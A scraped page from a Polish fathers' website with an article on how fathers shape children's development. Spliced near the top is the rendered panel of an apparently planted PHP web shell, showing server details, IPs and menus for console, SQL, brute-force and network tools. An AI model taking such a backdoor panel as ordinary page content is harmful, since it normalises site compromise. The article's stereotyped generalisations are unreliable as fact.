W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:48:06
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Tata lepszy od mamy?
14.11.2007.
Okazuje się, że jest wiele dziedzin życia dziecka, w których to ojcowie mają zdecydowanie większy wpływ od matek!

Podsumowując ostatnie kilkadziesiąt lat eksperymentów i statystyk, możemy zobaczyć, jak wiele w życiu dziecka zależy właśnie od postawy ojca.

Z amerykańskich statystyk wynika, że 65 proc. gwałcicieli i prawie 75 proc. młodocianych zabójców wychowało się bez ojców! Z danych National Center for Fathering na uniwersytecie w Maryland dzieci w konsekwencji braku taty pięć razy częściej popadały w biedę i aż dziesięć razy częściej w skrajne ubóstwo. Z badań Harringtona wynika też, że mają mniejsze osiągnięcia akademickie. Dwukrotnie częściej kończą edukację na poziomie podstawowym. Negatywny wpływ, choć w mniejszym stopniu, ma także rozwód rodziców. Zdaniem amerykańskiej psycholog Judith Wallerstein, chłopcy, których rodzice się rozstali częściej wykazują zachowania buntownicze i agresywne. U dziewczynek natomiast zauważono tzw. "sleeper effect" - są one mniej aktywne w życiu codziennym, a po kilku latach, nawet w wieku dorosłym, mogą pojawić się u nich zaburzenia depresyjne. Psycholodzy odkryli, że nastolatkowie określający swój kontakt z ojcem jako zły, wyżej oceniają doświadczany poziom stresu, co będzie rzutowało na ich dobrostan psychiczny w dorosłym życiu.

Świeżo upieczony tata
Badania wykazały, że obecność i zachowanie ojca są istotne już od pierwszych chwil dziecka na świecie. I tak, ojcowie obecni przy porodzie nawiązują z dzieckiem bliższą więź i szybciej uzyskują jego zaufanie. Panowie niedoświadczeni w roli ojca często zostawiają kąpanie dziecka matce, bojąc się, że sobie nie poradzą lub zrobią to gorzej od niej. Niepotrzebnie! Psychologowie zachęcają mężczyzn do uczestniczenia w czynnościach pielęgnacyjnych, ponieważ niemowlęta, które są często kąpane przez ojców mają szybszy i lepszy rozwój ruchowy. Mężczyźni są bardziej cierpliwi i zostawiają dziecku więcej swobody, pozwalają swoim pociechom ruszać nogami czy rękami. Ich spokój i opanowanie szybko udzielają się dzieciom, dlatego, gdy są chore, dobrze, żeby to panowie zajmowali się usypianiem dzieci, ponieważ są w tym bardziej skuteczni. Z zaangażowania taty w opiekę nad niemowlakiem wypływa co najmniej jeszcze jedna korzyść. Dzieci, którymi często zajmowali się ojcowie w ciągu pierwszych dwóch miesięcy życia są bardziej towarzyskie i bardziej lubiane.
Zabawa - tylko z tatą!

Wiadomo, że wyobraźnia to domena mężczyzn. Z badań amerykańskiej psycholog Jeanie McHale wynika, że ojcowie wymyślają ciekawsze zabawy przez matek. Gry przez nich proponowane lepiej stymulują dalszy rozwój psychoruchowy i intelektualny. Jednak aby dziecko wyniosło z takiej zabawy pełną korzyść musi zostać spełniony jeszcze jeden warunek. Badano grupę dzieci w wieku 12 miesięcy. Zabawy proponowane przez ojców były bardziej rozwijające dla dzieci, które miały z nimi dobry kontakt i często zostawały pod ich opieką. Mogły wówczas skoncentrować się na obiektach będących przedmiotem zabawy. Dzieci, które wcześniej spędzały mało czasu z tatą były mniej zainteresowane nowymi zabawami, trudniej było im się skupić na sytuacji dookoła, szukały bliskości z ojcem.


Tylko nie maminsynek

Maminsynki cieszą się złą sławą zarówno wśród dzieci jak i dorosłych, kobiet i mężczyzn. To właśnie od ojca zależy, czy jego dziecko "wyrośnie na maminsynka". Bardzo istotny wpływ ma tu czas spędzany sam na sam w pierwszych latach życia. Mężczyźni pozwalają dzieciom eksperymentować, a nawet sami je do tego zachęcają. W przeciwieństwie do matek, które koncentrują się przede wszystkim na pilnowaniu. W ten sposób ojcowie uczą dzieci samodzielności - większe, jest zatem prawdopodobieństwo, że ich dzieci będą dążyły do niezależności. Podobnie w nauce samodyscypliny i odpowiedzialności mężczyźni pozostają bezkonkurencyjni.

Jak wychować prymusa?

Z badań prof. Robina Palkovitza z University of Delawere wynika, że dzieci, których ojcowie biorą czynny udział w życiu szkolnym, chętniej się uczą. Dwie trzecie rodziców przychodzących na wywiadówki to matki. A właśnie w tych rodzinach, gdzie na zebrania klasowe przychodzili ojcowie, dzieci osiągały lepsze wyniki w nauce. Zasada ta sprawdza się zwłaszcza w przypadku córek. Dziewczynki wspierane przez tatę nie tylko lepiej się uczą, ale też bardziej lubią szkołę, chętniej uczestniczą w zajęciach pozalekcyjnych a w przyszłości mają mniejsze problemy w robieniu kariery zawodowej.

Ojciec - mężczyzna idealny

W dzieciństwie tata jest dla nas postacią bez wad. Zachowania ojca uważamy za naturalne, charakterystyczne dla całego rodzaju męskiego. Dlatego, jeżeli ojciec nie uczestniczy w pracach domowych, nakłonienie syna do zrobienia porządku zawsze będzie się kończyło awanturą. To zupełnie normalne, że nie chce wykonywać czynności, które w jego rozumieniu należą do kobiet. Tata jest modelowym przykładem mężczyzny także dla córek, które potem szukają partnera podobnego do niego. Jak wynika z badań, kobiety, które miały dobre relacje z ojcem budują trwalsze związki i nawiązują więcej bliskich więzi.

Magdalena Szot

Źródło informacji: INTERIA.PL

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.